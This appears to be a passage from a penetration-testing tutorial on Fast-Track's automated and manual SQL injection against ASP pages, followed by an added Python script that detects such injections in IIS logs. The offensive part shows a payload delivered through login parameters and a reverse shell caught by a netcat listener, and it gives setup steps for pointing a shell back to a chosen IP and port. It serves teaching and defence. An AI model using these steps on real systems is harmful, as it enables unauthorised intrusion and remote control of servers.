Fast-Track

Sending payload to parameter: txtLogin

Sending payload to parameter: txtPassword

[-] The PAYLOAD is being delivered. This can take up to two minutes. [-]

listening on [any] 4444 ...
connect to [10.211.55.130] from (UNKNOWN) [10.211.55.128] 1041
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>

As you can see, Fast-Track handled the automatic detection of the POST 
parameters and injected the attack, completely compromising the affected 
system via SQL injection. 

NOTE

You can also use FTP to deliver your payload, although outbound FTP 
connections are generally blocked.

Manual Injection

If you have a different IP address listening for the reverse shell or you need 
to fine-tune some of the configuration settings, you can set up the injector 
manually.

Enter which SQL Injector you want to use

1. SQL Injector - Query String Parameter Attack
2. SQL Injector - POST Parameter Attack
3. SQL Injector - GET FTP Payload Attack
4. SQL Injector - GET Manual Setup Binary Payload Attack

Enter your choice: 4

The manual portion allows you to customize your attack for whatever reason.

You will need to designate where in the URL the SQL Injection is by using 'INJECTHERE

So for example, when the tool asks you for the SQL Injectable URL, type:

http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah

Enter the URL of the susceptible site, remember to put 'INJECTHERE for the injectible parameter

Example: http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah

Enter here: http://www.secmaniac.com/index.asp?id='INJECTHERE&date=2010

Enter the IP Address of server with NetCat Listening: 10.211.55.130

Enter Port number with NetCat listening: 9090
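
Seen from the defending side, the manual setup above carries the injection in a GET query string parameter, so the quote and whatever follows it end up in the web server's access log. The following is an added example, not part of the original text or of Fast-Track: it scans an IIS W3C log for such requests. The log lines, the field layout and the keyword heuristic are all constructed assumptions.

```python
import re
from urllib.parse import parse_qsl

# Constructed IIS W3C log excerpt (not from the page); documentation-range addresses.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2010-06-01 10:00:01 192.0.2.10 GET /index.asp id=7&date=2010 200
2010-06-01 10:00:02 192.0.2.11 GET /search.asp name=O%27Brien 200
2010-06-01 10:00:05 198.51.100.9 GET /index.asp id=7%27%3Bdeclare+@x+int--&date=2010 500
2010-06-01 10:00:06 198.51.100.9 GET /index.asp id=%27&date=2010 500
"""

# Heuristic (an assumption of this example): a quote followed by a statement
# separator, a comment marker or a T-SQL keyword. A value that is nothing but
# a quote is also flagged, since it is a typical probe for an injectable field.
SUSPICIOUS = re.compile(
    r"'\s*(;|--|/\*|\b(?:or|and|union|select|exec|declare|waitfor)\b)", re.I)

def suspicious_params(query):
    """Return names of query parameters whose decoded value looks like SQL injection."""
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if value.strip() == "'" or SUSPICIOUS.search(value):
            hits.append(name)
    return hits

def scan(log_text):
    """Return a list of (client_ip, uri_stem, [param names]) for flagged requests."""
    fields, findings = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            # The directive names the columns of the rows that follow it.
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        params = suspicious_params(row.get("cs-uri-query", ""))
        if params:
            findings.append((row["c-ip"], row["cs-uri-stem"], params))
    return findings

if __name__ == "__main__":
    for ip, stem, params in scan(SAMPLE_LOG):
        print(f"{ip} {stem} suspicious parameter(s): {', '.join(params)}")
```

A legitimate value such as `O'Brien` is not flagged, and POST bodies do not appear in these logs at all, so the POST parameter attack needs a different data source.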